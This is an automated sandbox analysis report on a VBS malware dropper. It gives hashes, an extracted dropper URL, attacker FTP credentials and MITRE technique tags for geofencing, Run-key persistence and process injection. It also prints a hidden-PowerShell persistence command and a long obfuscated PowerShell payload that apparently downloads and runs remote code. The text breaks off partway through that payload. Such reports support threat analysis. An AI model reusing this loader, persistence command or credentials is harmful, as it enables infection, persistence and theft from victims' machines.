84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs
Size

683KB
MD5

89af3d1c013508a4c303b662082b37b5
SHA1

27c09a549b4aa399d03440fc543fc72cea662231
SHA256

84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c
SHA512

716a5bf5a788d976138dac3c7b7eb968fb4c20ec06bf45e2d0dfc99aa4f1594eb067285c2c0597999876067951627722634cc9fc243a3736e535a13c385569f6
SSDEEP

1536:4vvvvvvvvvvvvvvvvvvvvvvvL88888888888888888888888888888888888888R:fvE

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 48 IoCs

flow	pid	Process
8	3244	powershell.exe
19	3244	powershell.exe
22	3244	powershell.exe
24	3244	powershell.exe
26	3244	powershell.exe
33	3244	powershell.exe
34	3244	powershell.exe
35	3244	powershell.exe
36	3244	powershell.exe
37	3244	powershell.exe
38	3244	powershell.exe
49	3244	powershell.exe
51	3244	powershell.exe
54	3244	powershell.exe
55	3244	powershell.exe
56	3244	powershell.exe
57	3244	powershell.exe
58	3244	powershell.exe
59	3244	powershell.exe
60	3244	powershell.exe
61	3244	powershell.exe
65	3244	powershell.exe
66	3244	powershell.exe
67	3244	powershell.exe
68	3244	powershell.exe
69	3244	powershell.exe
70	3244	powershell.exe
71	3244	powershell.exe
72	3244	powershell.exe
75	3244	powershell.exe
76	3244	powershell.exe
80	3244	powershell.exe
81	3244	powershell.exe
82	3244	powershell.exe
83	3244	powershell.exe
84	3244	powershell.exe
85	3244	powershell.exe
86	3244	powershell.exe
87	3244	powershell.exe
88	3244	powershell.exe
89	3244	powershell.exe
90	3244	powershell.exe
92	3244	powershell.exe
94	3244	powershell.exe
95	3244	powershell.exe
96	3244	powershell.exe
97	3244	powershell.exe
98	3244	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3244	powershell.exe
552	powershell.exe
4056	powershell.exe
4872	powershell.exe
432	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_mgm = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\yksas.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
552	powershell.exe
552	powershell.exe
3244	powershell.exe
3244	powershell.exe
3244	powershell.exe
4872	powershell.exe
4056	powershell.exe
4872	powershell.exe
4056	powershell.exe
432	powershell.exe
432	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1828 wrote to memory of 552	1828	WScript.exe	82
PID 1828 wrote to memory of 552	1828	WScript.exe	82
PID 552 wrote to memory of 3244	552	powershell.exe	84
PID 552 wrote to memory of 3244	552	powershell.exe	84
PID 3244 wrote to memory of 4056	3244	powershell.exe	89
PID 3244 wrote to memory of 4056	3244	powershell.exe	89
PID 3244 wrote to memory of 4872	3244	powershell.exe	90
PID 3244 wrote to memory of 4872	3244	powershell.exe	90
PID 3244 wrote to memory of 4656	3244	powershell.exe	91
PID 3244 wrote to memory of 4656	3244	powershell.exe	91
PID 3244 wrote to memory of 432	3244	powershell.exe	92
PID 3244 wrote to memory of 432	3244	powershell.exe	92
PID 3244 wrote to memory of 2608	3244	powershell.exe	94
PID 3244 wrote to memory of 2608	3244	powershell.exe	94
PID 3244 wrote to memory of 5056	3244	powershell.exe	95
PID 3244 wrote to memory of 5056	3244	powershell.exe	95
PID 3244 wrote to memory of 3048	3244	powershell.exe	98
PID 3244 wrote to memory of 3048	3244	powershell.exe	98
PID 3244 wrote to memory of 4360	3244	powershell.exe	99
PID 3244 wrote to memory of 4360	3244	powershell.exe	99
PID 3244 wrote to memory of 2640	3244	powershell.exe	100
PID 3244 wrote to memory of 2640	3244	powershell.exe	100
PID 3244 wrote to memory of 228	3244	powershell.exe	101
PID 3244 wrote to memory of 228	3244	powershell.exe	101
PID 3244 wrote to memory of 388	3244	powershell.exe	102
PID 3244 wrote to memory of 388	3244	powershell.exe	102
PID 3244 wrote to memory of 2392	3244	powershell.exe	103
PID 3244 wrote to memory of 2392	3244	powershell.exe	103
PID 3244 wrote to memory of 1948	3244	powershell.exe	106
PID 3244 wrote to memory of 1948	3244	powershell.exe	106
PID 3244 wrote to memory of 5084	3244	powershell.exe	107
PID 3244 wrote to memory of 5084	3244	powershell.exe	107
PID 3244 wrote to memory of 2316	3244	powershell.exe	108
PID 3244 wrote to memory of 2316	3244	powershell.exe	108
PID 3244 wrote to memory of 676	3244	powershell.exe	109
PID 3244 wrote to memory of 676	3244	powershell.exe	109
PID 3244 wrote to memory of 896	3244	powershell.exe	110
PID 3244 wrote to memory of 896	3244	powershell.exe	110
PID 3244 wrote to memory of 4100	3244	powershell.exe	111
PID 3244 wrote to memory of 4100	3244	powershell.exe	111
PID 3244 wrote to memory of 2488	3244	powershell.exe	112
PID 3244 wrote to memory of 2488	3244	powershell.exe	112
PID 3244 wrote to memory of 4424	3244	powershell.exe	113
PID 3244 wrote to memory of 4424	3244	powershell.exe	113
PID 3244 wrote to memory of 1828	3244	powershell.exe	114
PID 3244 wrote to memory of 1828	3244	powershell.exe	114
PID 3244 wrote to memory of 728	3244	powershell.exe	115
PID 3244 wrote to memory of 728	3244	powershell.exe	115
PID 3244 wrote to memory of 1552	3244	powershell.exe	116
PID 3244 wrote to memory of 1552	3244	powershell.exe	116
PID 3244 wrote to memory of 3932	3244	powershell.exe	117
PID 3244 wrote to memory of 3932	3244	powershell.exe	117
PID 3244 wrote to memory of 1056	3244	powershell.exe	118
PID 3244 wrote to memory of 1056	3244	powershell.exe	118
PID 3244 wrote to memory of 1416	3244	powershell.exe	119
PID 3244 wrote to memory of 1416	3244	powershell.exe	119
PID 3244 wrote to memory of 4940	3244	powershell.exe	120
PID 3244 wrote to memory of 4940	3244	powershell.exe	120
PID 3244 wrote to memory of 1400	3244	powershell.exe	121
PID 3244 wrote to memory of 1400	3244	powershell.exe	121
PID 3244 wrote to memory of 4552	3244	powershell.exe	122
PID 3244 wrote to memory of 4552	3244	powershell.exe	122
PID 3244 wrote to memory of 4480	3244	powershell.exe	123
PID 3244 wrote to memory of 4480	3244	powershell.exe	123

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$mpAQs = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉHoШḆЉOШḆЉB1ШḆЉFIШḆЉNQBtШḆЉGsШḆЉWШḆЉШḆЉvШḆЉGEШḆЉNgBhШḆЉDYШḆЉNШḆЉBhШḆЉDYШḆЉMwШḆЉtШḆЉDEШḆЉNgШḆЉ4ШḆЉGUШḆЉLQШḆЉ0ШḆЉDMШḆЉMgBkШḆЉC0ШḆЉOШḆЉШḆЉ4ШḆЉDgШḆЉNwШḆЉtШḆЉGIШḆЉOШḆЉШḆЉxШḆЉDIШḆЉYgBiШḆЉDEШḆЉNQШḆЉ1ШḆЉDkШḆЉMgШḆЉyШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgBpШḆЉG4ШḆЉZwByШḆЉGkШḆЉZШḆЉШḆЉuШḆЉDIШḆЉNgШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDIШḆЉQQШḆЉlШḆЉDMШḆЉRШḆЉBVШḆЉFQШḆЉRgШḆЉtШḆЉDgШḆЉJQШḆЉyШḆЉDcШḆЉJQШḆЉyШḆЉDcШḆЉaQBuШḆЉGcШḆЉcgBpШḆЉGQШḆЉLgШḆЉyШḆЉDYШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJgBzШḆЉG8ШḆЉdQByШḆЉGMШḆЉZQШḆЉ9ШḆЉGQШḆЉbwB3ШḆЉG4ШḆЉbШḆЉBvШḆЉGEШḆЉZШḆЉШḆЉmШḆЉHYШḆЉPQШḆЉlШḆЉDIШḆЉMgBlШḆЉGUШḆЉNgШḆЉ2ШḆЉDUШḆЉNQШḆЉ3ШḆЉDEШḆЉNШḆЉШḆЉxШḆЉDUШḆЉMwШḆЉyШḆЉGMШḆЉZШḆЉШḆЉ1ШḆЉDQШḆЉOQBiШḆЉDEШḆЉOQBkШḆЉDgШḆЉNШḆЉШḆЉxШḆЉDMШḆЉOШḆЉBlШḆЉDYШḆЉYgШḆЉwШḆЉDgШḆЉJQШḆЉyШḆЉDIШḆЉJwШḆЉgШḆЉCgШḆЉIШḆЉBdШḆЉF0ШḆЉWwB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwBbШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGwШḆЉbШḆЉB1ШḆЉG4ШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZQBrШḆЉG8ШḆЉdgBuШḆЉEkШḆЉLgШḆЉpШḆЉCШḆЉШḆЉJwBJШḆЉFYШḆЉRgByШḆЉHШḆЉШḆЉJwШḆЉgШḆЉCgШḆЉZШḆЉBvШḆЉGgШḆЉdШḆЉBlШḆЉE0ШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCcШḆЉMQBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉLgШḆЉzШḆЉHkШḆЉcgBhШḆЉHIШḆЉYgBpШḆЉEwШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉCcШḆЉKШḆЉBlШḆЉHШḆЉШḆЉeQBUШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉgШḆЉHgШḆЉbQB6ШḆЉFgШḆЉeШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBkШḆЉGEШḆЉbwBMШḆЉC4ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉdШḆЉBuШḆЉGUШḆЉcgByШḆЉHUШḆЉQwШḆЉ6ШḆЉDoШḆЉXQBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉBwШḆЉHШḆЉШḆЉQQШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwШḆЉpШḆЉCШḆЉШḆЉKQШḆЉgШḆЉCcШḆЉQQШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉkyE6ШḆЉJMhJwШḆЉgШḆЉCgШḆЉZQBjШḆЉGEШḆЉbШḆЉBwШḆЉGUШḆЉUgШḆЉuШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉKШḆЉBlШḆЉHMШḆЉbwBwШḆЉHMШḆЉaQBkШḆЉC4ШḆЉbwBpШḆЉGwШḆЉcwBDШḆЉCQШḆЉOwШḆЉpШḆЉCШḆЉШḆЉJwB0ШḆЉHgШḆЉdШḆЉШḆЉuШḆЉDEШḆЉMШḆЉBMШḆЉEwШḆЉRШḆЉШḆЉvШḆЉDEШḆЉMШḆЉШḆЉvШḆЉHIШḆЉZQB0ШḆЉHШḆЉШḆЉeQByШḆЉGMШḆЉcШḆЉBVШḆЉC8ШḆЉcgBiШḆЉC4ШḆЉbQBvШḆЉGMШḆЉLgB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC4ШḆЉcШḆЉB0ШḆЉGYШḆЉQШḆЉШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLwШḆЉvШḆЉDoШḆЉcШḆЉB0ШḆЉGYШḆЉJwШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉbwBpШḆЉGwШḆЉcwBDШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBTШḆЉHoШḆЉQwBCШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉG8ШḆЉaQBsШḆЉHMШḆЉQwШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉHcШḆЉSwByШḆЉHUШḆЉdgШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB3ШḆЉEsШḆЉcgB1ШḆЉHYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉB3ШḆЉEsШḆЉcgB1ШḆЉHYШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉM